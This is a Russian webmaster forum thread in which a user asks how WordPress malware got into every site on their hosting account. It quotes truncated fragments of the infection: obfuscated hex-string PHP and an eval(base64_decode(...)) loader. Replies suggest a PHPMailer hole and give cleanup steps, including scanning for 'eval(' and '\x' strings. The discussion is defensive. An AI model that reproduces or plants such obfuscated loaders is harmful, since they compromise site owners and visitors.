- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Добрый день, помогите пожалуйста решить проблему, если кто то сталкивался.
Сайт находится на Хостинге
Движок Wordpress
Заразились абсолютно все сайты одного аккаунта на хостинге. везде появились function.php файлы с содержимым "<?php $ked68a399 = 499;$GLOBALS['zb897e5']=Array();global$zb897e5;$zb897e5=$GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m537af']="\x27\x40\x71\x26\x25\x56\x79\x2a\x57\x58\x4d\x44\x52\x3b\x7e\x68\x6d\x5c\x47\x66\x75\x41\x4b\x3d\x28\x20\x4f\x6c\x38\x5d\x7d\x65\x6a\x3a\x48\x2b\x46\x55\x4e\x2d\x2e\x3e\x6e\x7c\x5a\x54\x6f\x60\x30\x76\x21\x59\x62\x61\x35\x5e\x45\x36\x24\x5b\x4c\x2f\x74\x63\x51\x23\xa\x31\x5f\x69\x67\x49\x33\x3c\x73\x3f\x70\x7b\x9\x22\xd\x4a\x78\x39\x43\x2c\x34\x77\x64\x29\x50\x32\x72\x6b\x42\x7a\x37\x53";$zb897e5[$zb897e5['m537af'][69].$zb897e5['m537af'][53].$zb897e5['m537af'][52].$zb897e5['m537af'][86].$zb897e5['m537af'][57].$zb897e5['m537af'][86].$zb897e5['m537af'][67].$zb897e5['m537af'][31]]=$zb897e5['m537af'][63].$zb897e5['m537af'][15].$zb897e5['m537af'][92];$zb897e5[$zb897e5['m537af'][52].$zb897e5['m537af'][53].$zb897e5['m537af'][86].$zb897e5['m537af'] и т.д
И index.php
<?php eval(base64_decode("aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHpwc2VnID0gNjAzMTsgZnVuY3Rpb24gYmNzcXF5a3coJGhkbm1iamFreiwgJHd6dmVkbWZqKXskZmF4b3l0ID0gJyc7IGZvcigkaT0wOyAkaSA8IHN0cmxlbigkaG
как определить где дыра ? не факт конечно что заражение началось конкретно с моего сайта, но естественно рассматривается как вариант.
Wordpress всегда вовремя обновляю, плагины тоже, из последних плагинов поставил только "wordpress-23-related-posts-plugin" остальные на сайте уже очень по долгу и обновляю всегда. Кто то сталкивался с подобным ?
Заразились абсолютно все на хостинге
Это точно? Тогда по поводу вопроса
Что за хостинг такой дырявый?
Виноват не верно выразился, не все сайты хотинга, а все сайты одного аккаунта
Тогда и проверять надо все сайты этого аккаунта.
Тогда и проверять надо все сайты этого аккаунта.
Ну это понятно, но что именно, все файлы удалили эти, а как узнать откуда они нарисовались ? появяться ведь снова скорее всего, если не найти источник, потому и спрашиваю, может кто сталкивался и знает, где искать надо
Добрый день, помогите пожалуйста решить проблему, если кто то сталкивался.
как определить где дыра ? не факт конечно что заражение началось конкретно с моего сайта, но естественно рассматривается как вариант.
Wordpress всегда вовремя обновляю, плагины тоже, из последних плагинов поставил только "wordpress-23-related-posts-plugin" остальные на сайте уже очень по долгу и обновляю всегда. Кто то сталкивался с подобным ?
Пока не проверишь код движков и сделаешь анализ сложно говорить откуда пошла зараза.
может кто сталкивался и знает, где искать надо
Перефразируя известное высказывание, можно сказать, что на всех работающих сайтах всё одинаково хорошо, а каждый сломанный сломан по-своему.
А все сайты в вашем аккаунте обновляются?
Скажите, пожалуйста, какой хостинг у вас? Удалось вам решить проблему? Нашли источники уязвимости?
Wordpress всегда вовремя обновляю, плагины тоже, из последних плагинов поставил только "wordpress-23-related-posts-plugin" остальные на сайте уже очень по долгу и обновляю всегда. Кто то сталкивался с подобным ?
Вирус попал через уязвимость в классе PHPMailer
/ru/forum/953300
Что нужно сделать:
1. Отключай POST запросы на всём аккаунте на время лечения
2. Скачивай поччерёдно сайт на компьютер ,сначала прогоняй Касперским (удалит шеллы) ,потом Ai-Bolit, потом ещё ручками ищи и иcправляй файлы содержащие такие строки как "eval(", "\x", "chr". Обычно вредоносный код добавляется начало файла с расширением php между тегами <?php ... ?>
3. Закачивай сайты обратно
4. Включай POST запросы
И не забудь обновить CMS